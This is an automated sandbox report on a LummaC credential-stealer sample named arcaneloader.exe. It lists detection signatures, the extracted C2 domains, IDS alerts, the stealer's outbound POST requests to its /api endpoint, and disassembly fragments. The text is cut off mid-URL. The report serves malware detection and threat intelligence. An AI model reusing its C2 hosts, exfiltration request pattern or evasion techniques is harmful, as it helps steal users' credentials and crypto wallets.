Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
arcaneloader.exe

Overview

General Information

Sample name:arcaneloader.exe
Analysis ID:1561494
MD5:f6af7a6808f0e831fed6566c54b1e94e
SHA1:c892db08342003ea729c89e4b763448999eb4f5a
SHA256:131415b711a7dbe49af20022577ad51c271d75175e32547a8107a56d7462f1d7
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • arcaneloader.exe (PID: 1280 cmdline: "C:\Users\user\Desktop\arcaneloader.exe" MD5: F6AF7A6808F0E831FED6566C54B1E94E)
    • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • arcaneloader.exe (PID: 280 cmdline: "C:\Users\user\Desktop\arcaneloader.exe" MD5: F6AF7A6808F0E831FED6566C54B1E94E)
  • cleanup
{"C2 url": ["fumblingactor.cyou"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2265617650.000000000327A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.2147698291.000000000349E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Process Memory Space: arcaneloader.exe PID: 280JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: arcaneloader.exe PID: 280JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              3.2.arcaneloader.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                3.2.arcaneloader.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T15:03:05.016322+010020283713Unknown Traffic192.168.2.649707172.67.155.47443TCP
                  2024-11-23T15:03:07.004777+010020283713Unknown Traffic192.168.2.649709172.67.155.47443TCP
                  2024-11-23T15:03:09.287935+010020283713Unknown Traffic192.168.2.649711172.67.155.47443TCP
                  2024-11-23T15:03:11.509699+010020283713Unknown Traffic192.168.2.649712172.67.155.47443TCP
                  2024-11-23T15:03:13.653451+010020283713Unknown Traffic192.168.2.649718172.67.155.47443TCP
                  2024-11-23T15:03:16.264662+010020283713Unknown Traffic192.168.2.649724172.67.155.47443TCP
                  2024-11-23T15:03:18.795759+010020283713Unknown Traffic192.168.2.649734172.67.155.47443TCP
                  2024-11-23T15:03:22.293764+010020283713Unknown Traffic192.168.2.649746172.67.155.47443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T15:03:05.706014+010020546531A Network Trojan was detected192.168.2.649707172.67.155.47443TCP
                  2024-11-23T15:03:07.718873+010020546531A Network Trojan was detected192.168.2.649709172.67.155.47443TCP
                  2024-11-23T15:03:23.048426+010020546531A Network Trojan was detected192.168.2.649746172.67.155.47443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T15:03:05.706014+010020498361A Network Trojan was detected192.168.2.649707172.67.155.47443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T15:03:07.718873+010020498121A Network Trojan was detected192.168.2.649709172.67.155.47443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T15:03:16.992599+010020480941Malware Command and Control Activity Detected192.168.2.649724172.67.155.47443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000000.00000002.2147698291.000000000349E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["fumblingactor.cyou"]}
                  Source: arcaneloader.exeReversingLabs: Detection: 42%
                  Source: arcaneloader.exeJoe Sandbox ML: detected
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fumblingactor.cyou
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041C8CA CryptUnprotectData,3_2_0041C8CA
                  Source: arcaneloader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49746 version: TLS 1.2
                  Source: arcaneloader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DCC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00DCC7DB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DCC72A FindFirstFileExW,0_2_00DCC72A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DCC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00DCC7DB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DCC72A FindFirstFileExW,3_2_00DCC72A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then push eax3_2_0040C10E
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+54h]3_2_004269C2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ecx, eax3_2_0042F246
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-5E227A31h]3_2_0040B270
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx eax, byte ptr [edi+edx-45495408h]3_2_0040CA1E
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-7B267145h]3_2_004222F0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_00442460
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]3_2_0040D487
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0B32BA1Ah]3_2_0040D487
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20802921h]3_2_0040ED41
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov edi, ecx3_2_0040ADDB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042EDFB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+04h]3_2_00429590
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp]3_2_0043F6C2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h3_2_00441E80
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-0015297Fh]3_2_0040CFE5
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042E84B
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-14DFF37Eh]3_2_00426810
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx+7F6CBAB8h]3_2_0042C0DE
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_004410E0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0041B888
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov word ptr [edi], cx3_2_0041B888
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042E8AB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 484CE391h3_2_004428B0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edi, byte ptr [ebp+ecx-3AD6A7F4h]3_2_0043A968
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_004411C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov esi, ecx3_2_0043E18E
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov esi, ecx3_2_00440268
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6DBC3610h3_2_0043D2C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov edx, eax3_2_0041B2ED
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx+7F6CBAB8h]3_2_0042C281
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_00420299
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]3_2_00420299
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041F2A9
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_004202AC
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]3_2_004202AC
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp]3_2_0043FAB9
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-2167E826h]3_2_0042EB58
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx eax, byte ptr [edi+edx-45495408h]3_2_0040CB0E
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00425330
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ecx, eax3_2_0040E3C6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]3_2_00442BD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 4F699CD4h3_2_00442BD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0041B382
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00429BAB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-2167E826h]3_2_0042EBBA
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041F416
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+30h]3_2_00425C1F
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]3_2_0042C430
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, word ptr [edi+ebp*4]3_2_00407CD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov edi, eax3_2_00402CA0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042D550
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ebx+00h]3_2_00401D20
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ecx, edx3_2_0042DDD6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042DDD6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041ED81
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_00440E40
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov eax, dword ptr [ebp-1Ch]3_2_0040A64A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-2C0ED492h]3_2_00441660
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_00441660
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00437670
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ebx, eax3_2_0041DE18
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]3_2_00409E30
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ecx, eax3_2_0042F6C5
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch]3_2_0040DECF
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_004096E0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042EDF6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-0DBDBB60h]3_2_00419F53
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_00440F70
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00401F10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042FF10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042FF10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00423F20
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_00440FCA
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]3_2_00402FD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042E7D7
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov byte ptr [edi], 00000020h3_2_0042E7F5
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042CFB0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], AF0E0C2Eh3_2_0043CFB0

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49724 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49746 -> 172.67.155.47:443
                  Source: Malware configuration extractorURLs: fumblingactor.cyou
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49746 -> 172.67.155.47:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.155.47:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=56D4XXNYZO2MRVK5P5FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12872Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XXQ7AGRVIGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6AAEYK46R6IOQ9S7O3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19970Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PD2T8EIINYSKEORWQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1221Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YM5UPZ14User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552578Host: frogs-severz.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: frogs-severz.sbs
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: fumblingactor.cyou
                  Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: arcaneloader.exe, 00000003.00000003.2286689845.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.s
